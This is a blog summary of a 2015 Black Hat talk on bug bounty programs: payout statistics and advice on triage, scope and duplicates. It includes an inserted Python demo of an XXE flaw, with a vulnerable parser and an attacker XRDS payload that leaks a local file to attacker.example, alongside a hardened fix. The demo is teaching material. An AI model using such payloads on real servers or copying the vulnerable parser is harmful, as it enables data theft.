Thursday, August 6, 2015

BHUSA15: Hi This Is Urgent Plz Fix ASAP: Critical Vulnerabilites and Bug Bounty Programs

Kymberlee Price, Bugcrowd (aka @kym_possible)

We won't be talking about low-level bug bounty programs today, just the critical bugs. Kymberlee has an extensive background as a developer and has lately been working on a "red team".

Google runs a vulnerability reward program (VRP) and publishes some data on it. The data doesn't include the Chrome, Android, or patch reward programs - but it covers lots of other things: google.com, Google Play, etc.

As a program matures, fewer vulnerability reports come in - but the ones that do tend to be higher quality. Google has had to increase its bounties to keep the bugs coming in.

Facebook has a similar program and received 17,000 submissions in 2014 alone. Out of those, only 61 were high-severity bugs. Their minimum award is $500. Their total payout for valid submissions was $1.3 million to 321 researchers. Their top 5 researchers made a total of $256,750 - those had to be massive vulnerabilities.

India produces the most valid bug submissions to Facebook, with Egypt second and the USA third. The average payout was $1,343 in India, $1,220 in Egypt and $2,470 in the US.

GitHub's bug bounty program is one year old today!

Microsoft will pay up to $100,000 for novel exploitation techniques against protections built into the OS, and an additional reward of up to $100,000 if you also develop a defense.

Microsoft runs a "hall of fame", which indicates you received a bounty. If your vuln results in a CVE, you'll be credited in the security advisory.

Whether the target is software or an online service changes who submits your bugs (for example, India is very high for Microsoft's online services, but submits far fewer reports against its software).

Across the 166 customer bug bounty programs Bugcrowd followed, there were 37,227 submissions. About eight thousand of those were non-duplicate, valid vulnerabilities. Of those, 3,621 were awarded, paying out $700,000+ (average payout around $200, largest $10,000).

Every one of these programs is getting really critical vulnerabilities.

Who is finding these? Professional pen testers and consultants (in their spare time), former developers, QA engineers and IT admins.

India, the US and Pakistan are the top three countries by volume of submissions.

Reginaldo Silva reported an XML external entity (XXE) vulnerability in a PHP page that would have let an attacker point Facebook's OpenID login (which used Gmail as a provider) at an attacker-controlled URL and then answer Facebook's requests with malicious XML. It was fixed quickly, and Silva was rewarded and recognized.
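To show what the bug class above actually does, here is an added example that is not from the talk or from Facebook's code: a Python reconstruction (the original was PHP) of a server that fetches an OpenID provider's XRDS discovery document and pulls the endpoint out of the `URI` element. The attacker-controlled document carries a `DOCTYPE` that declares an external entity pointing at a local file; the "vulnerable" parser expands it into the endpoint, so the secret leaks into a URL the server will later request from the attacker. The hardened version refuses any document with a `DOCTYPE` and keeps external entity resolution off. The XRDS content, the secret file and every function name are constructed for the example.

```python
from __future__ import annotations

import io
import pathlib
import tempfile
import xml.parsers.expat
import xml.sax
import xml.sax.handler


class DoctypeNotAllowed(ValueError):
    """Raised by the hardened parser when the document declares a DTD."""


class _UriCollector(xml.sax.handler.ContentHandler):
    """Collects the text of every <URI> element (the OpenID endpoint in XRDS)."""

    def __init__(self):
        super().__init__()
        self.uris = []
        self._buf = None

    def startElement(self, name, attrs):
        if name == "URI":
            self._buf = []

    def characters(self, content):
        if self._buf is not None:
            self._buf.append(content)

    def endElement(self, name):
        if name == "URI" and self._buf is not None:
            self.uris.append("".join(self._buf).strip())
            self._buf = None


def _parse_xrds(data: bytes, resolve_external_entities: bool) -> list[str]:
    """Parse XRDS bytes with xml.sax; the flag decides whether SYSTEM entities are fetched."""
    handler = _UriCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    # With external-general-entities on, expat fetches SYSTEM entities (file://, http://)
    # and splices the fetched text into the document. That is the XXE primitive.
    parser.setFeature(xml.sax.handler.feature_external_ges, resolve_external_entities)
    parser.parse(io.BytesIO(data))
    return handler.uris


def parse_openid_endpoints_vulnerable(data: bytes) -> list[str]:
    """The bug: trusts the provider's XML and lets the parser resolve external entities."""
    return _parse_xrds(data, resolve_external_entities=True)


def reject_doctype(data: bytes) -> None:
    """Fail closed on any DOCTYPE: no DTD means no entity declarations at all."""
    p = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeNotAllowed(f"DOCTYPE {name!r} is not allowed in discovery documents")

    p.StartDoctypeDeclHandler = on_doctype
    p.Parse(data, True)  # also raises ExpatError for malformed input


def parse_openid_endpoints_hardened(data: bytes) -> list[str]:
    """The fix: reject DTDs up front, then parse with external entity resolution off."""
    reject_doctype(data)
    return _parse_xrds(data, resolve_external_entities=False)


def build_attacker_xrds(secret_uri: str) -> bytes:
    """Constructed attacker-served XRDS: an external entity smuggled into the endpoint URL."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE xrds [ <!ENTITY secret SYSTEM "{secret_uri}"> ]>\n'
        '<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns="xri://$xrd*($v*2.0)">\n'
        '  <XRD><Service priority="0">\n'
        '    <Type>http://specs.openid.net/auth/2.0/server</Type>\n'
        '    <URI>https://attacker.example/cb?leak=&secret;</URI>\n'
        '  </Service></XRD>\n'
        '</xrds:XRDS>\n'
    ).encode()


# Constructed benign discovery document from a well-behaved provider.
BENIGN_XRDS = (
    b'<?xml version="1.0"?>\n'
    b'<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns="xri://$xrd*($v*2.0)">\n'
    b'  <XRD><Service priority="0">\n'
    b'    <Type>http://specs.openid.net/auth/2.0/server</Type>\n'
    b'    <URI>https://openid.example/ud</URI>\n'
    b'  </Service></XRD>\n'
    b'</xrds:XRDS>\n'
)


def run_demo() -> dict:
    """Plant a stand-in secret on disk, then feed the attacker's XRDS to both parsers."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_file = pathlib.Path(tmp) / "db.conf"
        secret_file.write_bytes(b"db_password=s3cr3t")  # constructed server-side secret
        payload = build_attacker_xrds(secret_file.as_uri())
        leaked = parse_openid_endpoints_vulnerable(payload)
        try:
            parse_openid_endpoints_hardened(payload)
            hardened = "accepted"
        except DoctypeNotAllowed:
            hardened = "rejected"
    return {"leaked": leaked, "hardened": hardened}


if __name__ == "__main__":
    print(run_demo())
```

The vulnerable path returns an endpoint of the form `https://attacker.example/cb?leak=db_password=s3cr3t`; the moment the server contacts that "provider", the file contents travel to the attacker. Rejecting the `DOCTYPE` outright is the simplest robust fix, because it removes every entity declaration rather than trying to enumerate which ones are dangerous.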

Kymberlee then did a deep dive into a few of these fun (and very serious) vulnerabilities, including video and audio from the researchers who found them. The targets included banks and cars!

Tell researchers in advance what you need from them so you can triage faster (by email or web form). Set expectations, and have a rapid triage and prioritization process in place so you get to the P1s first.

Don't expect an eloquent write-up - English may not be the researcher's first language. Allow them to submit a video of the reproduction steps.

Define "in scope" and "out of scope" clearly, and have a process for handling things that fit neither category (because the scope wasn't defined well enough - it will happen).

To reduce noise, provide pointers to guidance and training, like Bugcrowd's forum.

Have a plan for duplicates. You don't see many for P1 or P2, because those get fixed quickly. Don't let the lower-priority bugs languish, either: if they are reported over and over, you are wasting resources telling researchers they've hit a duplicate - and if researchers are finding the bug every week, so are the bad guys.

Some bugs are so severe that a single one is worth the entire program. You don't want those vulnerabilities out there.

How to reduce noise? Publish your program SLA and stick to it. Stop rewarding bad behavior (e.g. don't give someone a "hall of fame" acknowledgement just because they are pestering you). Avoid creating bad behavior in the first place by being consistent, rewarding quickly and having good documentation.

By crowdsourcing, you bring people from around the world onto your security team - people who cannot or do not attend conferences like Black Hat.

This was a really fascinating and informative presentation!